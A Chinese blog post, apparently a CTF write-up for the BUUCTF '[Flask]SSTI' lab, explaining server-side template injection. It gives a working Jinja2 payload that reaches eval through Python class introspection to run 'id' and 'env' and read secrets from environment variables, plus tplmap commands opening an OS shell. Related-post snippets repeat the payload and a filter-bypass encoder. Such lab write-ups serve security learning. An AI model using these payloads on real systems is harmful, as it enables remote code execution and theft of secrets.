buuctf [Flask]SSTI

最新推荐文章于 2024-02-18 19:11:04 发布
最新推荐文章于 2024-02-18 19:11:04 发布
阅读量2.5k 收藏 11
点赞数 3
分类专栏: buuctf real 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/114882798
版权

漏洞简介

SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。

复现过程
在这里插入图片描述
访问http://node3.buuoj.cn:29153/?name={{2*2}}
在这里插入图片描述
说明SSTI漏洞存在。

获取eval函数并执行任意python代码的POC:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

打印环境变量

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("env").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

在这里插入图片描述
拿到flag

然后还有一个tplmap脚本

python tplmap.py -u “http://node3.buuoj.cn:29153/?name=1”在这里插入图片描述
python tplmap.py -u “http://node3.buuoj.cn:29153/?name=1” --os-shell
在这里插入图片描述
env打印环境变量
在这里插入图片描述

exploitsec
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flask.tgz310
01-04
flask.tgz310
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器时,即使没有创建任何变量或函数,还是会有很多函数可供使用,这些就是python的内建函数。 名称空间:从名称到对象的映射 1.内建名称空间:python自带名字,在解释器启动时产生,存放一些pytho
[Flask]SSTI1 buuctf
weixin_74790320的博客
02-18 456
然后我们就用{{''.__class__}}看类的类型,但是无所谓,啥类型都可以,因为我们要找到的是他的基类,然后通过基类去找子类。然后在子类中找到catch_warnings这个类,然后去这个类的全局变量里面找到eval,上面链接我复现了vulhub的SSTI,其实本质上是一道题。{{''.__class__.__base__}}找到基类。所以就可以命令执行,然后flag在env环境变量里面。声明:本篇文章csdn要我一天发两篇所以我来水的。{%code%}这里是代码的意思在ssti里面。
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
Python离线安装Flask
04-18
Python离线安装Flask模块所需要的包: 笔者安装环境:Python3.7.4+Windows 10(64位)/Windows 7(64位) 使用时请看Readme
buuctf_练[GYCTF2020]FlaskApp
m0_66225311的博客
10-26 664
`ssti`的`python debug`的`PIN`码计算,调用`debug`命令行执行命令。存在`ssti`注入就能进行命令执行,使用拼接操作绕过关键字过滤`['o'+'s']`。不同版本的`python`计算pin码的代码不同。`python`的模板注入可以通过for循环遍历子类特征名的方式,来寻找能够执行命令的子类模块
buuctf-[Flask]SSTI
m0_62094846的博客
04-22 1071
页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。 是要GET一个参数name,这个不好想到 顺便确定有SSTI漏洞 <加字母就会被过滤 Smarty中的方法也不能用了 获取eval函数并执行任意python代码的POC {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__i...
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 2586
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
BUUCTF-Real-[Flask]SSTI
分享
02-02 1134
服务端模板注入SSTI,可进行代码执行操作!
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4133
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
flask
06-15
flask库本身
flask全栈开发资料
最新发布
05-08
flask全栈开发资料
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3230
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2410
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
SSTI模板注入讲解与真题实操
告白的博客
02-12 1678
1.什么是SSTI注入? SSTI模板注入(Server-Side Template Injection),通过与服务端模板的 输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的。
BUUCTF--[pasecactf_2019]flask_ssti
qq_46263951的博客
08-12 513
根据题目我们可以知道这是一道Flask SSTI的题。 打开后允许我们输入东西,会返回用奇怪字符包裹的昵称。 我们试一下{{2*2}},然后返回4。这里存在这SSTI。 这里过滤了很多东西,就不在一一测试,使用十六进制进行绕过. #转16进制py脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1173
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
[Flask]SSTI
1ance's blog
11-18 1434
文章目录环境解题思路参考 环境 BUUCTF上的在线环境,启动靶机,获取链接: http://node4.buuoj.cn:27904 解题思路 访问后显示页面。 根据题目提示是考SSTI,所以我们传个name参数看看。 http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。 我们在构造{{2*3}}看看,是否存在SSTI。 成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。 这里我在网上找的: {% for c in
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值